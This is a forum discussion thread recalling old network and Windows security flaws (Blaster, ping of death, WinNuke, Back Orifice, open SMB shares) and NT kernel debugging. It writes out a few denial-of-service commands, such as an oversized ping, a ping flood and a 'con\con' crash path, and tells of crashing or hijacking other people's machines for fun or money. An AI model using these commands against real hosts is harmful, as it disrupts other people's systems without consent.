I build a port check way back to determine if services are up. It crashed half the company by simply opening a few tcp ports to the machines.
Ridiculous days :)
I also remember SMB vulnerabilities that stayed unpatched for years on some machines. That was already when Metasploit existed, so you could inject VNC into most Windows hosts on local network with just a few commands. These days at least the patching is super fast.
Even into the late 90s early 2000, modems (including ADSL) didn't come with a router, you had to establish a PPPoE connection from your computer, which also means your home machine was directly on the WAN with no firewall protection.
I can't remember which version of windows but it must have been 98 or ME, you had to rush to download and install a patch when you connected it first to the internet before one of these exploits would make it crash.
I never encountered any of this, except that one roommate liked to brag about his expensive win 9x box, and me and another roommate would take turns using our junky linux and nt desktops to “pause” his machine with “ping -f”, usually in the middle of a lecture about how amazingly fast it was.
Later, we had an openbsd router running on an old 386 that we jammed a few old 10MBit 3com cards into (later, Linux, plus $20 ne2000’s).
Those things had 100% uptime other than power outages, ne2000 swaps, and the time I unplugged it after 50 gallons of water ran through it (stayed up, worked fine after I made a new copy of the soggy boot floppy).
Later we ended up with some shitty belkin router, etc. “Unplug it and plug it back in? Really?”
Eventually, I got a WRT54GL (emphasis on the L) which worked for a few years.
Now I’m back on OpenBSD. The only software downtime is due to PG&E power cycling it 100 times, and fsck expecting me to send a “y” over the serial port one of those times. Now it is double battery backed.
It works, but I’m living in fear of the day my PC Engines APU board finally gives up the ghost.
Also, sometimes our starlink’s linux cpu hangs. You’d think they could get that right. It’s not like it’s as hard as building a car, launching rockets, or operating a network that’s used for public safety announcements.
> Even into the late 90s early 2000, modems (including ADSL) didn't come with a router, you had to establish a PPPoE connection from your computer, which also means your home machine was directly on the WAN with no firewall protection.
Even today modems don't always come with a routers. In fact, I like them that way :).
IIRC, the problem in the late 90s/early 2000s was routers were thought of as only necessary to get multiple computers online, and it was pretty common for people households to only own a single desktop. There wasn't enough security consciousness earned through repeated failure, so it "made sense" to direct connect consumer machines to the internet.
We actually had a LAN years before we had broadband, and I setup a PC running Linux as a router to share our 33.6 modem to the household. But before that? The PC direct dials into the ISP, and got a publicly-routable IP.
IIRC Windows XP up to SP2 was vulnerable to this. Basically if you ran the install with the DSL modem attached, your PC was compromised even before the end of setup.
When W32/Blaster[0] came out I worked at a small ISP doing tech support and computer repair. A tech and I imaged an old box we had in the corner with a clean XP, assigned it a static IP in our /24, plugged it in and started a stopwatch. It didn’t even make it two minutes before it was infected.
I was working for a small ISP in that time frame and that's when we started blocking incoming windows ports. And yea, it was annoying for the few techie types that tried to run SMB and could actually protect their stuff.
For the other 99.9% percent of the users it protected them and us.
Yeah Blaster is one of the few worms I've ever (knowingly) been infected with. As you say, it was literally less than a minute or two between connecting an unpatched box and getting it.
that is really unpleasant.. engineers worked, companies worked and volunteers also worked to make the modern Internet, then selfish-clever, thieving, control-oriented militaristic jerks from WINDOWS filled the content with WINDOWS virus activity to play cheap stealing tricks on unsuspecting people. And you call it "the Internet" .. it has nothing to do with "the Internet" as much as the cheap and aggressive culture of BS from WINDOWS at that time
It would be more fair to criticize the corporate culture at Microsoft in the 90s that led to this situation.
They simply didn't really care. If another OS was dominant, it is easy to argue that fundamental security issues could have been addressed in a better fashion, if management wanted it to be so.
To wit, this is the same era of computing that spawned OpenBSD. You can't say with a straight face that OpenBSD would have been brought down by oversized ping packets or be allowed to accept traffic out of the box like Windows was.
> I can't remember which version of windows but it must have been 98 or ME, you had to rush to download and install a patch when you connected it first to the internet before one of these exploits would make it crash.
Much more than that. With Windows 95, you could send an illegal ICMP with a simple "ping.exe -l 65510 victim.host.ip.address". Your Windows 95 might crash/misbehave after that, but not always.
The receiving end, the destination IP, on the other hand... These would panic, crash, dump, hang or reboot: Windows, MacOS, Netware, AIX, Linux, DEC Unix, Nextstep, OpenVMS, SCO Unix, HP-UX, Convex OS, Solaris.
It was very funny in the very first hours, the little toy Win95 machines obliterating all those big, expensive Unix servers on the network.
That was the precise moment when we started filtering ICMP echo on the routers. Hardly anyone did this before.
Earlier versions of Windows (98? 95?) also used to share things like drives (C$, D$) and printers with the dial-up connection by default.
I remember connecting to a printer of a classmate over the internet and printing a page, to his surprise. All you needed was the IP, which was trivial to get from ICQ, back in the days.
There was a time when you could SMB mount shares from servers at MS over the public internet (and e.g. do things like download alphas and betas that were not visible on the ftp server).
I remember early Bitcoin exchanges that had everything stolen because they left all of their unencrypted private keys on SMB shares that were left visible to the Internet. IIRC this is what finally took down MtGox, almost 20 years after the release of Windows 95. Some people never learn.
What was more fun when the spammers figured out 'net send'. I showed that to one guy I worked with and that thing had a nasty bug. If you got one of the parameters wrong it would send a message to every computer on the domain. He had to explain to the top guys why they had funny messages on their screen.
When I was at the university and without a fully developed frontal lobe I thought it was a great idea to test this in the lab.
Ended up creating a "battleship"-like game. Two people, each trying to crash the other's machine. Since the IPs were randomly assigned by DHCP and for some inexplicable reason changed frequently (every day or so), we would be trying to guess what the other machine's IP was.
Given how they were physically arranged, we were able to see the machines blue screening (but not always fully crashing).
Of course, there was a lot of collateral damage as some machines were in used by people that weren't part of the 'game'. Thankfully, most of the time they didn't fully crash. Most of the time.
Ah, the good ole days of "hey what's your IP address?" followed by typing those four magical numbers into Winnuke and then watching a person just drop off ICQ. Still makes me chuckle. That worked for years.
Oh I remember those times. There was a guy in high-school 2 years younger that one day shown me that he wrote a C implementation of WinNuke on the school Unix server and he was then crashing Windows PCs in the lab for fun.
He was a really smart guy and AFAIK he's been working at Google for a few years now (maybe he's on HN even?)
I remember when CdC released Back Orifice to remote control Windows machines, like ejecting CDROM and such [1]. We really did come a long way, where 0-days go for 20 million dollars. [2].
I was managing a few labs full of machines used for training on NT4 which meant I was frequently re-imaging and could use effective remote control capability. Back Orifice was, at the time, the absolute best remote admin solution available for free. I could deploy it in the image and then use it to kick off reimage process, reboot, log out a student, or monitor their screen from the teacher's desk to share on the attached TV. It really was a handy tool for remote admin tasks.
Could also disable certain keys on victims keyboard. Did that in the office a bunch was hilarious watching co workers who had no idea what was going on. Perfect for a Monday morning.
I may or may not have known someone who wrote a shell script with the linux BO client to reset Windows machines' home pages to a porn site that paid a dollar for every unique clickthrough in IP ranges that were in specific foreign countries.
This person might have earned several hundred dollars each month for several months afterward. But opening their cdrom tray could have been fun too. He probably wishes he had thought of that.
My favorite 'thing' for historical windows was that accessing "C:\con\con" was an instant BSOD (Even over file sharing, or even over an image URL pointing to "file://C:/con/con")
I had my Mac exposed on the public Internet around 2021/22, and I expected to be hacked instantly, but nothing actually happened. Times really have changed.
The feeling of being able to chat with friends over nc was pretty powerful, though.
Ah, the retro-computing rabbit hole. Harmlessly divorced from any real-world consequences, but truly satisfying nonetheless. A real honey trap for nerds.
I look back to the computers before my time - the PET's and such, and I think it'd be fun to play with them. Or maybe an old IRIX box.
But a 486?? That brings back too many memories of blue screens and waiting forever because we couldn't afford memory and was thus swapping to disk. Still too soon for me, I suppose.
I went back and booted my old Indigo from back in the day, as well as an old Sun 3/80 recently. It wasn't as great as I expected it to be, and all the annoyances from when I used to do actual work on them came flooding back quickly. Nostalgia is a heck of a drug.
I still reserve the PET as a perfect machine because 1) it's the first machine I really used as a kid, and 2) I haven't yet been foolish enough to try and go back to one in over 40 years now.
Unsurprisingly the mathematician ignores real world problems: problems we understand but can't be bothered to solve (e.g. hunger, poverty, climate, etc.).
If we don't have a viable solution, do we really understand the problem?
Not being facetious. Saying we know that people are hungry is like saying my computer doesn't do the thing I want it to do. The difficult part is (in both cases) solving the problem. And that INCLUDES the pesky "why can't society just agree to do the good thing" part.
Poverty also not a problem, just a definition (bottom 10-20% producers).
Climate also not a problem. Just the reality of humans paper clipping finite resources. algae did the same thing when it took co2 from 99% of atmosphere down to less than 1%. Now it’s the algae left arm wrestling the human left.
They are all easy to solve if it weren’t for social inertia though. It’s not like there is a fundamental law requiring poverty to exist, we know exactly what is causing these issues and have the resources to deal with them. We just don’t want the inconvenience of it.
Well, once the bug is identified, yes. I wonder how do you find a bug like that, I guess you keep reading the disassembly of the trapping code until you find the problem. I don't think he could have used QEMU or some other form of debugging.
"NTOSKRNL.EXE + debug symbols + IDA helped me understand how the remote break-in is supposed to work. I knew that something in the remote break-in code path before the first debug packet is sent is going to reboot my machine. So I patched "JMP SHORT $" instructions into the relevant code-path. If I placed it before the crash point, the machine hangs. If I placed it after the crash point, the machine reboots. This allowed me to "bisect" where the crash is happening."
-----
Here is a Chat-GPT breakdown of the comment:
NTOSKRNL.EXE: This is the kernel of the Windows NT operating system. When people refer to the "Windows kernel," they're typically talking about this executable.
debug symbols: These are additional pieces of data that describe the internal structures and functions within a binary (like an EXE or DLL). They make it much easier to understand what's going on when analyzing or debugging the binary.
IDA: IDA (Interactive DisAssembler) is a popular disassembler and debugger used by security researchers and reverse engineers to analyze binaries.
how the remote break-in is supposed to work: It sounds like the commenter is trying to understand how a specific feature or vulnerability related to remote debugging (or "remote break-in") operates.
something in the remote break-in code path before the first debug packet is sent: There's a sequence of events or a code path in the kernel related to the remote debugging feature. The problem seems to manifest before the first debug packet is sent over the network.
JMP SHORT $: This is an assembly instruction. The JMP instruction is used to jump to another part of the code. SHORT refers to a short jump, meaning the jump target is relatively close. The $ symbol refers to the current address of the instruction, so "JMP SHORT $" will cause the program to jump to itself, effectively causing an infinite loop.
patched "JMP SHORT $" instructions into the relevant code-path: By inserting this instruction at various points in the code, the commenter created intentional hangs in the system. This helped isolate where the crash occurs.
bisect: This term comes from the world of debugging and means to divide the code into smaller parts to determine where a problem is. In this context, the commenter is using the hang (from the JMP instruction) as an indicator. If they inserted the JMP instruction and the system hangs, it means the crash hasn't occurred yet. If they inserted the JMP instruction and the system reboots, it means the crash already happened. By moving the JMP instruction around, they can get closer to the exact point of the crash.
In essence, the commenter used a mix of reverse engineering tools and clever debugging tricks to narrow down where a crash was occurring in the Windows NT 3.1 kernel when using a remote debugging feature.
Not sure why this is downvoted, the comment is on point. Is it because it is partly gpt-generated content?
I wonder if patching memory worked in the debugger, if not this would have to be done by manually editing the kernel file with IDA or something, and rebooting the machine. But in either case this is a good way to find the problem.
If you don't want to be seeing ChatGPT generated content here, you should downvote it to discourage the poster from doing so. This is a perfect use of a downvote IMHO.
If you don't mind or care enough, obviously don't downvote, and if you love it, upvote it. That's how we get our community to develop some shared standards of communication.
FWIW, if someone wants ChatGPT content, they can just go to ChatGPT too.
True, although in this case the ChatGPT explanation seems to be mostly accurate.
The one dubious point is the definition of "bisect". The definition is completely accurate in this context. But the sentence after the definition starts with "In this context,", implying that the definition itself should be relatively context-independent. Yet the term "bisect" in programming is more commonly used to refer to something slightly different: dividing some code's commit history into parts, not the code itself.
Also, several of the explanations are wordy and uninsightful, though not false.
…Admittedly, this is all beside the point. ChatGPT output carries a high risk of being inaccurate, so even if it's accurate in some specific case, readers have no way of knowing that. Which means that you shouldn't post ChatGPT output unless you can personally vouch for its accuracy, but in that case why use ChatGPT at all? Still, in this case I'll retrospectively vouch for it.
I added the ChatGPT explanation after the fact because I thought some readers might not have the background to understand the original explanation and I could vouch for its accuracy.
Honestly didn't expect it to cause such a backlash in this forum...
SO's auto collapsing of comments just makes no sense every time I see it. It isn't hiding lowest voted ones, it isn't hiding newest or oldest ones. It feels random (and unnecessary).
IMO they should just add paging to it than hiding if the space is the concern.
FWIW these slotket adapters and such for compatibility on the right boards, usually Abit, Asus, and maybe even MSI back then, Well they had REAL overclocking abilities - How fast is your RAM and what kind of clock settings can the motherboard get away with in terms of multipliers? This was the earlyish days of overclocking - Celerons and Pentium IIs
I once had a Celeron 600 in one adapter for compatibility and then that was in Slot II to Socket 370 adapter, something comparable to [1] happily chugging along at 1.2Ghz, maybe even got that bad boy up to 1.4Ghz under Windows ME of all the OS before I eventually fried that CPU.
Some recent processor has even more ridiculous curve, you can even get 80% performance with half power usage. Or even 1/2 performance with 1/4 power. Recent amd/intel processor has the habit to push the frequency to heat envelope (in other word, overclocked to the extreme by default) instead of a proper frequency with sane power usage.
Actually, that kind of thing makes a lot of sense to me and I think it's a good idea. I've read so many stories about hardware with bogus ACPI and EDID data causing problems with Linux support over the years. It seems to me that Linux tends to treat hardware information as always correct, whereas Windows is far less trusting and has information about device-specific bugs. The result is that while things tend to work out-of-the-box on Windows, they require far more tinkering on Linux.
Troubleshooting was different when we came up. Just your wits and maybe some gurus you could call on a landline as backup. No fancy internet with tons of answers of varying degrees of usefulness.
As long as you had access to a library... When I was 14 or so, I used the MS-DOS DEBUG program to run step-by-step an executable that did something to change blinking to high-intensity background in text mode. After one hour or so I found the magic BIOS call... which of course was documented in the technical manual I found in the library one year later (because new school = new library with more books).
When I was a kid I used to have this Charles Petzold book that I learned this stuff from, it was basically my Bible. I don't have it anymore, I wish I could remember what it was. People recommend Code a lot, but I don't think that was it.
Edit: it wasn't Charles Petzold at all, it was DOS Power Tools by Paul Somerson
Books were just knowledge. Debugging was skill.
At certain point in knowledge-gain, you develop a good skill and after that point, you don't need books anymore. Maybe from time to time. I still have a suse6 printed manual.. I can't see it in the cellar, but It've been HUUGE
This is just macho bravado, and it can be fun, but definitely not the most efficient use of time for someone.
If you have access, why would you debug machine code without using the reference manuals for a particular processor and OS and whatever else you're dealing with? You could spend hours chasing a "impossible" problem that could be easily be found in the errata for a giving stepping.
But you still need some critical amount of knowledge that you need from somewhere. I wish I at least knew there exists something like assembler when I was 12. I naively tried to make some demos, but basic was not adequate, so I considered demoscene as "magic".
Luckily, as a single individual you only need one (or at most a handful) of (programming) jobs at a time. So you don't need to worry about the vast majority of jobs.